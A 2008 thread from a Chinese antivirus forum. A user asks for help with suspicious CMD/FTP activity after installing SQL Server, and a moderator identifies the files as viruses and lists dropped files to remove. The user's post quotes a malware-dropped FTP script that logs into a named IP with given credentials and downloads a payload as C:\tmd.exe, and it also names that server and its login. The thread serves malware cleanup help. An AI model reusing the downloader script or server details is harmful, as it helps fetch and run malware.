几个未知文件！帮忙看下！ - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 可疑文件交流几个未知文件！帮忙看下！

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

几个未知文件！帮忙看下！

逆风飞扬nffy 初生襁褓狮帖子:3 注册: 2008-06-24 来自:	发表于： 2008-06-24 16:31 \| 只看楼主短消息资料字号：小中大 1楼几个未知文件！帮忙看下！装了SQL200 DE 后一直出现CMD、FTP进程，然后去这个FTP：//218.61.11.180地址下载了下面附件的内容，用户名和密码都是：2048dj。帮忙检测一下是什么，是不是病毒？现在这个版本是没有报毒，刚刚我去这个地址下了一个“远程.EXE”不小心运行了，查杀病毒有一个Trojan.Win32.Undef.cbj 路径为Explorer.EXE>>C:\WINDOWS 文件是Explorer.EXE，还有在SYSTEM32中发现TENCENT.SYS 用记事本打开内容是：open 218.61.11.180 2048dj 2048dj get calc.exe C:\tmd.exe bye 不知道和这个有没有关系！急盼回复！用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) 附件: 您所在的用户组无法下载或查看附件
逆风飞扬nffy 初生襁褓狮帖子:3 注册: 2008-06-24 来自:	分享到：

baohe 大版主帖子:72578 注册: 2003-04-10 来自:	发表于： 2008-06-24 16:46 \| 短消息资料字号：小中大 2楼回复: 几个未知文件！帮忙看下！引用: 原帖由逆风飞扬nffy 于 2008-6-24 16:31:00 发表装了SQL200 DE 后一直出现CMD、FTP进程，然后去这个FTP：//218.61.11.180地址下载了下面附件的内容，用户名和密码都是：2048dj。帮忙检测一下是什么，是不是病毒？现在这个版本是没有报毒，刚刚我去这个地址下了一个“远程.EXE”不小心运行了，查杀病毒有一个Trojan.Win32.Undef.cbj 路径为Explorer.EXE>>C:\WINDOWS 粗略看了一下。都是病毒。结果如下： 1/pc.exe病毒，请删除之。它释放的病毒文件如下（也一并删除）： c:\windows\system32\00043d65.ini c:\windows\system32\drivers\yaypua.sys c:\windows\system32\yaypua.dll 2/cacl.exe病毒，请删除之。它释放的C:\windows\360safe.exe也要删除。 3/远控.exe病毒，请删除之。它替换系统文件beep.sys，请删除之。然后从dllcache文件夹拷贝一个beep.sys到%system32%\drivers文件夹中。
baohe 大版主帖子:72578 注册: 2003-04-10 来自:

逆风飞扬nffy 初生襁褓狮帖子:3 注册: 2008-06-24 来自:	发表于： 2008-06-24 16:49 \| 只看楼主短消息资料字号：小中大 3楼回复：几个未知文件！帮忙看下！谢谢哦
逆风飞扬nffy 初生襁褓狮帖子:3 注册: 2008-06-24 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT